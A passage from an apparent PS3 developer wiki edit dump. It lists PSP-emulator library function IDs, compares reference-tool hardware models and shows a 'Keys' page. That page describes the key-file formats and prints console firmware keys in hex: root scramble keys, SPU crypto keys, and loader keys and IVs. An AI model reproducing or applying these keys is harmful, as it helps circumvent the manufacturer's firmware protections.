sceUsbCamStillGetInputLength<br /> 0xF8847F60 sceUsbCamPollReadMicEnd<br /> 0xF90B2293 sceUsbCamWaitReadVideoFrameEnd<br /> 0xF93C4669 sceUsbCamAutoImageReverseSW<br /> 0xFB0A6C5D sceUsbCamStillInput<br /> 0xFDB68C23 sceUsbCamGetSharpness<br /> <br /> Library: sceUsbGps<br /> 0x5881C826 sceUsbGpsGetStaticNavMode<br /> 0x6EED4811 sceUsbGpsClose<br /> 0x7C16AC3A sceUsbGpsGetState<br /> 0x934EC2B2 sceUsbGpsGetData<br /> 0x9F267D34 sceUsbGpsOpen<br /> 0xA8ED0BC2 sceUsbGpsSetStaticNavMode<br /> <br /> Library: sceUsbMic<br /> 0x06128E42 sceUsbMicPollInputEnd<br /> 0x2E6DCDCD sceUsbMicInputBlocking<br /> 0x45310F07 sceUsbMicInputInitEx<br /> 0x5F7F368D sceUsbMicInput<br /> 0x63400E20 sceUsbMicGetInputLength<br /> 0xB8E536EB sceUsbMicInputInit<br /> 0xF899001C sceUsbMicWaitInputEnd<br /> <br /> Library: sceUsbSer<br /> 0x0C40864C sceUsbSerGetDTR<br /> 0x105B2FB5 sceUsbSerRegisterDTRCallback<br /> 0x193E613B sceUsbSerClose<br /> 0x2432D28D sceUsbSerRead<br /> 0x3EFDC183 sceUsbSerGetWriteDataSize<br /> 0x41303714 sceUsbSerCancel<br /> 0x473B6BF3 sceUsbSerWriteCB<br /> 0x50AD923C sceUsbSerSetRecvCBThreshold<br /> 0x7501C273 sceUsbSerRegisterSentCallback<br /> 0x82CF9F2A sceUsbSerUnregisterRecvCallback<br /> 0x886AF215 sceUsbSerGetReadDataSize<br /> 0x8B9F5C97 sceUsbSerClear<br /> 0x938AD8E2 sceUsbSerUnregisterSentCallback<br /> 0x999B21E1 sceUsbSerRegisterRecvCallback<br /> 0xA3F75968 sceUsbSerReadCB<br /> 0xBF8B3E85 sceUsbSerWrite<br /> 0xD6CD027C sceUsbSerUnregisterDTRCallback<br /> 0xE23DEB0A sceUsbSerGetWriteFreeSize<br /> 0xE2F0E3E3 sceUsbSerFlushCB<br /> 0xE60A8C56 sceUsbSerGetReadFreeSize<br /> 0xE945D8E9 sceUsbSerEnd<br /> 0xE9D739DF sceUsbSerSetSentCBThreshold<br /> 0xEDBFD745 sceUsbSerInit<br /> 0xEFF02189 sceUsbSerFlush<br /> 0xFD9A2340 sceUsbSerOpen<br /> <br /> Library: sceUtility<br /> 0x0251B134 sceUtilityScreenshotInitStart<br /> 0x05AFB9E4 sceUtilityHtmlViewerUpdate<br /> 0x06A48659 sceUtilityRssSubscriberShutdownStart<br /> 0x0940A1B9 sceUtilityPsnUpdate<br /> 0x094198B8 sceUtilityPsnGetStatus<br /> 0x0D5BC6D2 sceUtilityLoadUsbModule<br /> 0x0E0C27AF sceUtilityAutoConnectAbort<br /> 0x1281DA8E sceUtilityInstallInitStart<br /> 0x1579A159 sceUtilityLoadNetModule<br /> 0x16D02AF0 sceUtilityNpSigninInitStart<br /> 0x180F7B62 sceUtilityGamedataInstallAbort<br /> 0x24AC31EB sceUtilityGamedataInstallInitStart<br /> 0x2995D020 sceUtilitySavedataErrInitStart<br /> 0x2A2B3DE0 sceUtilityLoadModule<br /> 0x2AD8E239 sceUtilityMsgDialogInitStart<br /> 0x2B96173B sceUtilityRssSubscriberGetStatus<br /> 0x32E32DCB sceUtilityGamedataInstallShutdownStart<br /> 0x34B78343 sceUtilityGetSystemParamString<br /> 0x3A15CD0A sceUtilityAutoConnectInitStart<br /> 0x3AAD51DC sceUtilityStoreCheckoutGetStatus<br /> 0x3DFAEBA9 sceUtilityOskShutdownStart<br /> 0x41E30674 sceUtilitySetSystemParamString<br /> 0x42071A83 sceUtilityPS3ScanInitStart<br /> 0x434D4B3A sceUtilityGetNetParam<br /> 0x45C18506 sceUtilitySetSystemParamInt<br /> 0x4928BD96 sceUtilityMsgDialogAbort<br /> 0x4AECD179 sceUtilityGamedataInstallUpdate<br /> 0x4B0A8FE5 sceUtilityRssSubscriberInitStart<br /> 0x4B85C861 sceUtilityOskUpdate<br /> 0x4DB1E739 sceUtilityNetconfInitStart<br /> 0x4FED24D8 sceUtilityGetNetParamLatestID<br /> 0x50C4CD57 sceUtilitySavedataInitStart<br /> 0x54A5C62F sceUtilityStoreCheckoutShutdownStart<br /> 0x5EEE6548 sceUtilityCheckNetParam<br /> 0x5EF1C24A sceUtilityInstallShutdownStart<br /> 0x6332AA39 sceUtilityNetconfGetStatus<br /> 0x64D50C56 sceUtilityUnloadNetModule<br /> 0x67AF3428 sceUtilityMsgDialogShutdownStart<br /> 0x6F56F9CF sceUtilityRssReaderUpdate<br /> 0x7853182D sceUtilityGameSharingUpdate<br /> 0x81C44706 sceUtilityRssReaderInitStart<br /> 0x8326AB05 sceUtilityRssReaderGetStatus<br /> 0x86A03A27 sceUtilityScreenshotContStart<br /> 0x86ABDB1B sceUtilityNpSigninGetStatus<br /> 0x8874DBE0 sceUtilitySavedataGetStatus<br /> 0x88BC7406 sceUtilitySavedataErrGetStatus<br /> 0x89317C8F sceUtilityPS3ScanGetStatus<br /> 0x91E70E35 sceUtilityNetconfUpdate<br /> 0x946963F3 sceUtilityGameSharingGetStatus<br /> 0x95FC253B sceUtilityMsgDialogUpdate<br /> 0x9790B33C sceUtilitySavedataShutdownStart<br /> 0x9A1C91D7 sceUtilityMsgDialogGetStatus<br /> 0x9F313D14 sceUtilityAutoConnectShutdownStart<br /> 0xA03D29BA sceUtilityInstallUpdate<br /> 0xA084E056 sceUtilityRssSubscriberUpdate<br /> 0xA5DA2406 sceUtilityGetSystemParamInt<br /> 0xA7BB7C67 sceUtilityPsnInitStart<br /> 0xAB083EA9 sceUtilityScreenshotUpdate<br /> 0xB0FB7FF5 sceUtilityRssReaderContStart<br /> 0xB57E95D9 sceUtilityGamedataInstallGetStatus<br /> 0xB62A4061 sceUtilitySavedataErrShutdownStart<br /> 0xB8592D5F sceUtilityStoreCheckoutUpdate<br /> 0xBDA7D894 sceUtilityHtmlViewerGetStatus<br /> 0xC130D441 sceUtilityPsnShutdownStart<br /> 0xC4700FA3 sceUtilityInstallGetStatus<br /> 0xC492F751 sceUtilityGameSharingInitStart<br /> 0xC629AF26 sceUtilityLoadAvModule<br /> 0xCDC3AA41 sceUtilityHtmlViewerInitStart<br /> 0xD17A0573 sceUtilityPS3ScanShutdownStart<br /> 0xD23665F4 sceUtilityAutoConnectUpdate<br /> 0xD4B95FFB sceUtilitySavedataUpdate<br /> 0xD4C2BD73 sceUtilityAutoConnectGetStatus<br /> 0xD81957B7 sceUtilityScreenshotGetStatus<br /> 0xD852CDCE sceUtilityPS3ScanUpdate<br /> 0xDA97F1AA sceUtilityStoreCheckoutInitStart<br /> 0xE19C97D6 sceUtilityNpSigninShutdownStart<br /> 0xE49BFE92 sceUtilityUnloadModule<br /> 0xE7B778D8 sceUtilityRssReaderShutdownStart<br /> 0xED0FAD38 sceUtilitySavedataErrUpdate<br /> 0xEFC6F80F sceUtilityGameSharingShutdownStart<br /> 0xF3F76017 sceUtilityOskGetStatus<br /> 0xF3FBC572 sceUtilityNpSigninUpdate<br /> 0xF5CE1134 sceUtilityHtmlViewerShutdownStart<br /> 0xF6269B82 sceUtilityOskInitStart<br /> 0xF64910F0 sceUtilityUnloadUsbModule<br /> 0xF7D8D092 sceUtilityUnloadAvModule<br /> 0xF88155F6 sceUtilityNetconfShutdownStart<br /> 0xF9E0008C sceUtilityScreenshotShutdownStart<br /> <br /> Library: sceVaudio<br /> 0x03B6807D sceVaudioChReserve<br /> 0x27ACC20B sceVaudioChReserveBuffering<br /> 0x346FBE94 sceVaudioSetEffectType<br /> 0x67585DFD sceVaudioChRelease<br /> 0x8986295E sceVaudioOutputBlocking<br /> 0xCBD4AC51 sceVaudioSetAlcMode<br /> <br /> Library: sceWlanDrv<br /> 0x0C622081 sceWlanGetEtherAddr<br /> 0x93440B11 sceWlanDevIsPowerOn<br /> 0xD7763699 sceWlanGetSwitchState<br /> <br /> Library: pemuExt<br /> 0x2C1F5DA6 pemuExtUtilityGetFreeSize<br /> 0x5D915C5B pemuExtUtilityThemeInstallAbort<br /> 0x806D1DCB pemuExtUtilityMusicExportInitStart<br /> 0x9F85A1E3 pemuExtUtilityMusicExportAbort<br /> 0xA9102BD9 pemuExtUtilityThemeInstallInitStart<br /> 0xAB94E451 pemuExtUtilityThemeInstallGetStatus<br /> 0xAF7228AB pemuExtUtilityMusicExportShutdownStart<br /> 0xB95A85D1 pemuExtUtilityThemeInstallUpdate<br /> 0xBFBB2A30 pemuExtIsStereoscopic3d<br /> 0xCAC8A9DA pemuExtUtilityMusicExportUpdate<br /> 0xDBF1A3A9 pemuExtUtilityThemeInstallShutdownStart<br /> 0xE4786D09 pemuExtUtilityMusicExportGetStatus<br /> <br /> = internally handled by the emulator =<br /> sceVideocodec<br /> sceAudiocodec<br /> sceMpegbase<br /> sceReg<br /> sceNetIfhandle_lib<br /> sceWlanDrv_lib<br /> sceNetAdhocAuth_lib<br /> &lt;/pre&gt;<br /> === OPEN PSP SDK ===<br /> <br /> pspsdk-1.0+beta2 Documentation<br /> <br /> http://psp.jim.sh/pspsdk-doc/index.html<br /> <br /> === PEmuCoreLib SPU Usage ===<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;4&quot; | PEmuCoreLib<br /> |-<br /> ! Core !! Job !! Source !! Notes<br /> |-<br /> | SPU0 || DrawSync Extended Mode Something|| || <br /> |-<br /> | SPU1 || Extended Mode Something|| || <br /> |-<br /> | SPU2 || DMac || || if memcpy size &gt;0x110<br /> |-<br /> | SPU3 || ME || || Media Engine?<br /> |-<br /> |}<br /> <br /> === PSPEMU speculation/talk ===<br /> Compatibility list custom PSP to PS3.<br /> <br /> [[PSP_Emulator_Compatibility_List|PSP Emulator Compatibility List]]<br /> <br /> *http://psx-scene.com/forums/f328/psponps3-compatibility-chart-113244/<br /> <br /> *http://www.pshomebrew.net/wiki/PSP_On_PS3_Compatibility_List<br /> <br /> *[[https://docs.google.com/spreadsheet/ccc?key=0AowGG2G1KRsgdHg5aDJUTnZ2bGR0NEZhMS1xekVXWGc#gid=0| Google Spreadsheet]] and forum reports at http://www.ps3hax.net/showthread.php?t=54435<br /> <br /> <br /> <br /> &lt;!--//<br /> may be add other compatibility list/links to reference, sorry this should be on talk page.<br /> //--&gt;<br /> <br /> ==== PSP Remasters Button Remapping ====<br /> *ADDITIONAL_KEY_ASSIGN type 2 part 2?<br /> 3 state? enable/disable/always<br /> (16 bit (target), 16 bit (source))<br /> <br /> For each byte on 0x47C6C544, binary:<br /> 4 7 C 6 C 5 4 4 = 0x47C6C544<br /> 01 00||01 11 11 00||01 10 11 00||01 01 01 00||01 00<br /> || || || || || <br /> Left | Left Down Right Up<br /> on |D-Pad D-Pad D-Pad D-Pad<br /> right<br /> AStick.<br /> <br /> For each byte on 0x48C6C944, binary:<br /> 4 8 C 6 C 9 4 4 = 0x48C6C944<br /> 01 00||10 00 11 00||01 10 11 00||10 01 01 00||01 00<br /> || || || || || <br /> Left | L1 Down R1 Up<br /> on D-Pad D-Pad<br /> right<br /> AStick.<br /> <br /> {| class=&quot;wikitable&quot;<br /> |+PS3 Buttons Identifyers<br /> ! PS3 button &lt;BR /&gt;&lt;sup&gt;(target)&lt;/sup&gt; !! Identifyer !! Notes<br /> |-<br /> | {{padru}} || ? &lt;!-- 0001 --&gt; || &lt;!-- 1 --&gt;<br /> |-<br /> | {{padrr}} || ? &lt;!-- 0010 --&gt; || &lt;!-- 2 --&gt;<br /> |-<br /> | {{padrd}} || ? &lt;!-- 0011 --&gt; || &lt;!-- 3 --&gt;<br /> |-<br /> | {{padrl}} || 0100 || 4<br /> |-<br /> | {{padr3}} || ? || <br /> |-<br /> | {{padlu}} || ? || <br /> |-<br /> | {{padlr}} || ? || <br /> |-<br /> | {{padld}} || ? || <br /> |-<br /> | {{padll}} || ? || <br /> |-<br /> | {{padl3}} || ? || <br /> |-{{cellcolors|lightgrey}}<br /> | || || <br /> |-<br /> | {{padselect}} || ? || <br /> |-<br /> | {{padps}} || ? || <br /> |-<br /> | {{padstart}} || ? || <br /> |-<br /> | {{dpadu}} || ? || <br /> |-<br /> | {{dpadr}} || ? || <br /> |-<br /> | {{dpadd}} || ? || <br /> |-<br /> | {{dpadl}} || ? || <br /> |-<br /> | {{padl1}} || ? || <br /> |-<br /> | {{padr1}} || ? || <br /> |-<br /> | {{padl2}} || ? || <br /> |-<br /> | {{padr2}} || ? || <br /> |-<br /> | {{padtriangle}} || ? || <br /> |-<br /> | {{padcircle}} || ? || <br /> |-<br /> | {{padcross}} || ? || <br /> |-<br /> | {{padsquare}} || ? || <br /> |-<br /> |}<br /> <br /> *Speculation notes<br /> **Stick directions could be maped to axis: {{padlx}} {{padly}} {{padrx}} {{padry}}<br /> <br /> {| class=&quot;wikitable&quot;<br /> |+PSP Buttons Identifyers<br /> ! PSP button &lt;BR /&gt;&lt;sup&gt;(source)&lt;/sup&gt; !! Identifyer !! Hex Value<br /> |-<br /> | not used || 0001 || 1<br /> |-<br /> | not used || 0010 || 2<br /> |-<br /> | {{padstart}} || 0011 || 3<br /> |-<br /> | {{dpadu}} || 0100 || 4<br /> |-<br /> | {{dpadr}} || 0101 || 5<br /> |-<br /> | {{dpadd}} || 0110 || 6<br /> |-<br /> | {{dpadl}} || 0111 || 7<br /> |-<br /> | {{psptl}} || 1000 || 8<br /> |-<br /> | {{psptr}} || 1001 || 9<br /> |-<br /> | not used || 1010 || A<br /> |-<br /> | not used || 1011 || B<br /> |-<br /> | {{padtriangle}} || 1100 || C<br /> |-<br /> | {{padcircle}} || 1101 || D<br /> |-<br /> | {{padcross}} || 1110 || E<br /> |-<br /> | {{padsquare}} || 1111 || F<br /> |-<br /> |}<br /> <br /> *There are more button icons if needed in [[TemplateTest#Buttons]] page &lt;!-- delete this line when the tables are completed --&gt;<br /> <br /> {{Reverse engineering}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Reference_Tool_models&diff=45666 Template:Reference Tool models 2017-08-16T09:49:52Z <p>Mathieulh: </p> <hr /> <div>{{ed right|Reference Tool models}}<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Model !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Flash_(Hardware)|Flash]] !! [[South_Bridge|SB]] !! [[Syscon_Hardware|Syscon]] !! [[Communication Processor|CP]] !! [[Harddrive|BDemu HDD]] !! [[Harddrive|GameOS HDD]] !! [[Bluray_Drive|Bluray Drive]] !! [[HDMI | HDMI Ports]] !! [[Flash:OtherOS|OtherOS]] !! [[CELL BE]] !! [[RSX]] !! [[USB|USB&lt;br/&gt;Ports]] !! [[GbLAN | GbLan&lt;br/&gt;Ports]] !! [[MultiCardReader|Flash&lt;br/&gt;Readers]] !! Support:&lt;br /&gt;[[Emulation#pspemu|PSP]]&lt;br /&gt;[[PS2_Compatibility|PS2]]&lt;br /&gt;[[Emulation#ps1emu|PS1]] !! SA-&lt;BR /&gt;CD !! WiFi&lt;br/&gt;802.11&lt;BR /&gt;b/g !! [[SKU_Models#Datecode_/_Manufacturing_Date|SKU&lt;br/&gt;Release&lt;br/&gt;date]] !! [[System_Software|SDK/FW &lt;br/&gt;support]] !! [[Template:Metbootldr|downgradeable&lt;br/&gt;Min.&lt;br/&gt;praxis]] !! Other<br /> |-<br /> | [[DECR-1000|DECR-1000(A/J)]] || 0x01 || [[TMU-520]] || [[K9F2G08U0M | 2x 256MB NAND]] || [[CXD2973AGB-4]] || [[CXR713F120A]] || [[TCP-520]] || 400GB || 400GB || ?0x00? || 2 ({{NO}} CEC) || {{NO}} || {{90nm}} || {{90nm}} || 4 + 2 extra || 4 (1 for dbg.) || {{YES}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} &lt;!-- external antenna --&gt; || 2006 || =&gt;[[1.00 DECR|1.0.0]]&lt;br/&gt;or &lt;br/&gt;=&gt;[[2.30 DECR|2.3.0]] (since 1/2009) || &lt;abbr title=&quot;This System Firmware doesn't exist&quot;&gt;0.08&lt;/abbr&gt; || contains prototype components, hardware is identical to [[DEH-R1040]] with a different label/model name.<br /> |-<br /> | [[DECR-1400|DECR-1400A/J]] || 0x09 || [[DEB-001]] || [[&lt;!--?--&gt;S29GL128N90TFIR2|1x 16MB NOR]] || ?[[CXD2984GB]]? || [[CXR713120-201GB]] || (via SB) || - || 160 GB || ?0x0A? || 1 ({{NO}} CEC) || {{PARTIAL}} || {{45nm}} || {{65nm}} || 4 || 2 (1 for dbg.) || {{NO}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} || 6/2009 || =&gt;[[2.60 DECR|2.6.0]] || =&gt;[[2.60 DECR|2.60]] || same case as retail PS3<br /> |-<br /> |}<br /> <br /> Differences between the [[DECR-1000|1000]] and [[DECR-1400|1400]]:<br /> *[[DECR-1000]]:<br /> ** Gb-DEVLAN is connected to the [[Communication Processor]]<br /> ** With a pre (or equal to) [[0.85.010]] bootrom you do have two [[HDMI]] outputs.<br /> &lt;!-- ** Could be turned into a {{SD}} System Debugger by changing the [[South Bridge]] firmware, adding a special CP Sister Board and using a specific {{SD}} firmware --&gt;<br /> ** '''Not all DECR-1000 are equal! Despite Sony's documentation claiming otherwise, DECR-1000 units with RSX rom version b07 and above such as refurbished/serviced units (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;'''.<br /> <br /> * [[DECR-1400]]: <br /> ** You cannot use Performance monitoring functions (libperf, libprof, tuner for PS3)<br /> *** for SPU: PC sampling, Performance counters, Bookmark, RAW SPU support<br /> *** for [[RSX]]: Signal Trace, User Events.<br /> ** DECI3 is limited to one protocol and a data exchange size of 65535 bytes.<br /> ** The two [[GbLAN]]´s share the same MAC ID and cannot be used in the same network segment.<br /> ** Gb-DEVLAN is connected to [[South Bridge]].<br /> &lt;br/&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Keys&diff=45426 Keys 2017-08-02T14:20:21Z <p>Mathieulh: /* gpkg-key */ Added PS Vita gpkg keys.</p> <hr /> <div>[http://www.youtube.com/watch?v=wo19Y4tw0l8 Illegal Numbers - Numberphile]<br /> <br /> = Keys Notes =<br /> You can download the keys from: [http://www.ps3devwiki.com/files/devtools/ps3keys/ ps3keys] (or for scetool here : [http://www.ps3devwiki.com/files/devtools/scetool/data/ scetool/data/])<br /> &lt;!--// [https://github.com/search?utf8=%E2%9C%93&amp;q=PS3keys&amp;repo=&amp;langOverride=&amp;start_value=1&amp;type=Repositories&amp;language= ''ps3keys at Github''] / http://www.mirrorcreator.com/files/JSM2FRCD/ps3keys.exe_links [http://www.ps3devwiki.com/files/firmware/MFW-CEX/PS3MFWBuilder/ps3keys.exe ''ps3keys in RAR sfx (254.01 KB)''] / [http://www.mirrorcreator.com/files/EVWOWZES/ps3keys.zip_links ps3keys.zip (229.9 KB)] //--&gt;<br /> <br /> == Location ==<br /> keyfiles should be placed in ~/.ps3 or %userprofile%\ps3keys &lt;br /&gt;<br /> <br /> == Naming ==<br /> naming:<br /> * file prefix: lv0, lv1, lv2, app, iso, ldr, pkg, spp, np<br /> : (NB: some tools use np- others drm-, or npdrm- prefix, uniform naming in all tools is adviced)<br /> * file suffix: .092 .315 .341 .350 .355 .356<br /> : (NB: actually 080, 092, 240, 340, 350, 355, 356, 360, 365, 370 ...)<br /> * key file (erk): %s-key-%s<br /> * iv file (riv): %s-iv-%s<br /> * ctype file (curvetype): %s-ctype-%s<br /> * pub file (public): %s-pub-%s<br /> * priv file (private): %s-priv-%s<br /> <br /> == Key Table Structure==<br /> === generic in loaders ===<br /> Keys are kept in tables and indexed by the sdk_type in the SELF header.<br /> struct key_obj {<br /> uint8_t key[0x20];<br /> uint8_t iv[0x10];<br /> uint8_t pub[0x28];<br /> uint32_t curve_type;<br /> uint32_t always_zero?; // most likely padding: keys must be 16 byte aligned for the crypto routines<br /> }<br /> <br /> === appldr specific ===<br /> typedef struct _appldr_key_container<br /> {<br /> /* start-end (length) */<br /> u8 key[32]; /* 0x00-0x19 (0x20) */ (AES:ERK - 256bit Encryption Round Key) */<br /> u8 iv[16]; /* 0x20-0x2f (0x10) */ (AES:RIV - 128bit Reset Initialization Vector) */<br /> u8 pub[40]; /* 0x30-0x57 (0x28) */ (ECDSA:public - 320bit) */<br /> u32 ctype; /* 0x58-0x5b (0x04) */ (ECDSA:curvetype - 32bit formatted 8bit value) */<br /> u32 null; /* 0x5c-0x5f (0x04) */ (always zero - 32bit formatted) */<br /> /* 0x00-0x5f (0x60) */ (total per revision/type entry - 768bit) */<br /> } appldrKeyContainer;<br /> <br /> appldrKeyContainer rev0x00_0x0c_1[13];<br /> <br /> appldrKeyContainer rev0x00_0x0c_2[13];<br /> <br /> appldrKeyContainer unknown;<br /> <br /> appldrKeyContainer npdrm_1[13];<br /> appldrKeyContainer npdrm_2[13];<br /> <br /> appldrKeyContainer revoke;<br /> <br /> = Curves Notes =<br /> * first &quot;curve&quot; (type 00) is probably reserved (and cannot be used because it's an invalid curve that serves no purpose since it's fully zeroed)<br /> * second curve is ONLY used in kirk CMD 1 parameters (which means that some of the keys/curves from psp were ported to ps3)<br /> * third curve is the most widely used curve and serves the general use purpose<br /> <br /> = Key Scrambling =<br /> Starting with firmware version 3.60 loader keys have been encrypted. Look [http://www.sendspace.com/file/mx21uz here] for a tool that decrypts them.<br /> Besides that, [http://www.sendspace.com/file/ykermj there is] an implementation of the cryptographic algorithm which is used to encrypt/decrypt lv1ldr from lv0 and root scramble key at the SPU side. <br /> <br /> == Root scramble keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! type !! version !! key !! obfuscated key<br /> |-<br /> | root || 3.60-3.61 || &lt;code&gt;844F80F3C57C455C7F09&lt;/code&gt; || <br /> |-<br /> | root || 3.65-3.66 || &lt;code&gt;865128F745845947A0CE&lt;/code&gt; || <br /> |-<br /> | root || 3.7x || &lt;code&gt;0DAD161222CDDB00A631&lt;/code&gt; || <br /> |-<br /> | root || 4.00-4.1x || &lt;code&gt;D029857926C7A918D48E&lt;/code&gt; || <br /> |-<br /> | root || 4.20-{{latest}} || &lt;code&gt;F5FD0DFD54B738FC8895&lt;/code&gt; || &lt;code&gt;8B77B209CD58C688CF5E38C8FAFD781B&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Root crypto spu keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! version !! erk !! riv<br /> |-<br /> | 4.20-{{latest}} || &lt;code&gt;E044C1E29C53FEF2E064E31207D09D48676719789D59E5C1F004D002390F2360&lt;/code&gt;&lt;br&gt;&lt;code&gt;8350EBCCCA16A69A08E2A813F18B92EF688B163CB6C4781F0285AEAD4DAB0FD2&lt;/code&gt;&lt;br&gt;&lt;code&gt;555A7B10D87DA8C9257136546E1A6A33782DC8C1B1A888A3FB2000EFBC12DE7F&lt;/code&gt;&lt;br&gt;&lt;code&gt;FC6EC40EC3782C8C53625B96E72334E67073EC2C0395A5DB0A1CACA119E61A86&lt;/code&gt;&lt;br&gt;&lt;code&gt;ADA4401ADD1CC764A0C2DB4D58E13F8B23515AB750DCED2BAE626CCE7FD07242&lt;/code&gt;&lt;br&gt;&lt;code&gt;E2BF4D2503282798E4A736ACC388412D&lt;/code&gt; || &lt;code&gt;20385B4B1819FD8E691BBEF17001392B&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Scramble keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! type !! version !! key1 !! iv1 !! key2 !! iv2<br /> |-<br /> | isoldr || 3.60 || &lt;code&gt;5389A6DFA8567D43A80DA6DAB90EE946&lt;/code&gt; || &lt;code&gt;A51A2C7960AC1BE43AA0FB7695094188&lt;/code&gt; || &lt;code&gt;212E7E92FF1FB75AE5C1323037C34693&lt;/code&gt; || &lt;code&gt;90AF09A666BB0C663BF2FC8E5338B7B8&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65 || &lt;code&gt;E37A763FD7A559CFD7E1E2DA5C8CBAC4&lt;/code&gt; || &lt;code&gt;198361A904E748381CB9AA1DF5CCAB17&lt;/code&gt; || &lt;code&gt;23EAD00FC78D9A8B7785EB600124238C&lt;/code&gt; || &lt;code&gt;61B0D045DF5727EFC19E5BE53BE70F14&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70 || &lt;code&gt;9FD83EA32E9EAA0EF54AD0CFBB60D1DF&lt;/code&gt; || &lt;code&gt;194B649CDA9F4D814CD119C603E49FB5&lt;/code&gt; || &lt;code&gt;A9709BE3E8043BA24635A2617541E9D5&lt;/code&gt; || &lt;code&gt;F06A5B2FEF9CA87B1759DC53AEE1A3B5&lt;/code&gt;<br /> |-<br /> | isoldr || 4.11 || &lt;code&gt;FFD6342FC86B81F0E56C6867D618D72A&lt;/code&gt; || &lt;code&gt;A51A2C7960AC1BE43AA0FB7695094188&lt;/code&gt; || &lt;code&gt;194922A1EEB01E614884A44D1D7B7FC1&lt;/code&gt; || &lt;code&gt;90AF09A666BB0C663BF2FC8E5338B7B8&lt;/code&gt;<br /> |-<br /> | isoldr || 4.21 || &lt;code&gt;4DEA657828657CA86AB93E2162592B97&lt;/code&gt; || &lt;code&gt;EEB72FC7E42544C460E78EA30C72D211&lt;/code&gt; || &lt;code&gt;CE2D1A7AA4F4434058F0C8A64400CBF5&lt;/code&gt; || &lt;code&gt;852CC5C6C5D3B7EEB1801147B32E8D21&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60 || &lt;code&gt;F92C8666EFFBAC7EB583E54A257F7C05&lt;/code&gt; || &lt;code&gt;F2E70BC4BAC10C3D8DDBB7DC23053F9A&lt;/code&gt; || &lt;code&gt;DDF6A5B143C1141FEED01CDA719705C3&lt;/code&gt; || &lt;code&gt;018E695C3A29AF6E746A73CBF73DBDFD&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.65 || &lt;code&gt;546DE455AB15F33546D2296C2535FA44&lt;/code&gt; || &lt;code&gt;ACA9C00DA6D778A95EBD9D76E659C14F&lt;/code&gt; || &lt;code&gt;AB82EF1F62CC382CF2880A870499AE89&lt;/code&gt; || &lt;code&gt;6ECB2AC4DA8D400F0167F1EB9FD8D7F1&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.70 || &lt;code&gt;F98E56F3CB0D68797E3D81F0BE36CFBD&lt;/code&gt; || &lt;code&gt;7DA5A5487AFA3032BF49D40CEBEC2480&lt;/code&gt; || &lt;code&gt;7EAFED452D621269CB7EF46D7BE3DAD9&lt;/code&gt; || &lt;code&gt;A5C6E2A25C2DD09D6597F69EEB3A2CE5&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.11 || &lt;code&gt;80863EDBAE50DD4B16125FC9321BBC24&lt;/code&gt; || &lt;code&gt;1A9E31FEBD603A9CBE4ECD6026292466&lt;/code&gt; || &lt;code&gt;D4E2AA7293192CB1600D537A9E832F2D&lt;/code&gt; || &lt;code&gt;4503E4E505A773C55E0B8E1332341287&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.21 || &lt;code&gt;AC19D5DB427351434DC6DA3BD6E3DE6C&lt;/code&gt; || &lt;code&gt;66E68237D5B7228AA2F057B6043768E1&lt;/code&gt; || &lt;code&gt;466CD2F735628B8EF99D1793063BBB3B&lt;/code&gt; || &lt;code&gt;761907BA41A7945028D8FD8305B25BD2&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60 || &lt;code&gt;A25E7F097B2FC7B1082032C4387DB335&lt;/code&gt; || &lt;code&gt;0655809B26DF5F29E4E740D950A8CB53&lt;/code&gt; || &lt;code&gt;6B97507247CD680FE56D9E19D06DFC71&lt;/code&gt; || &lt;code&gt;B72B9DBB5C2CC74EB75C7B9815DBD5D8&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65 || &lt;code&gt;4B973A45A23894CBF0CDFC168B7EFB31&lt;/code&gt; || &lt;code&gt;2210B3103E7EDFD8CE0B25551B1D4003&lt;/code&gt; || &lt;code&gt;858CFE093654E3EFA16FCCE5F73C9591&lt;/code&gt; || &lt;code&gt;481472B4DF63EA5F883DAA2872EE5D2F&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70 || &lt;code&gt;85AEC67CB85BD04D3E7D3D76AA604FF5&lt;/code&gt; || &lt;code&gt;51B40C084A81C9BE35108FFC0C008F64&lt;/code&gt; || &lt;code&gt;616004C6C2D614737106FE41668826A7&lt;/code&gt; || &lt;code&gt;A765A845AAB477EABFEF4274ADA6AF04&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.11 || &lt;code&gt;020397E6D292288F80659F06E2DACEFB&lt;/code&gt; || 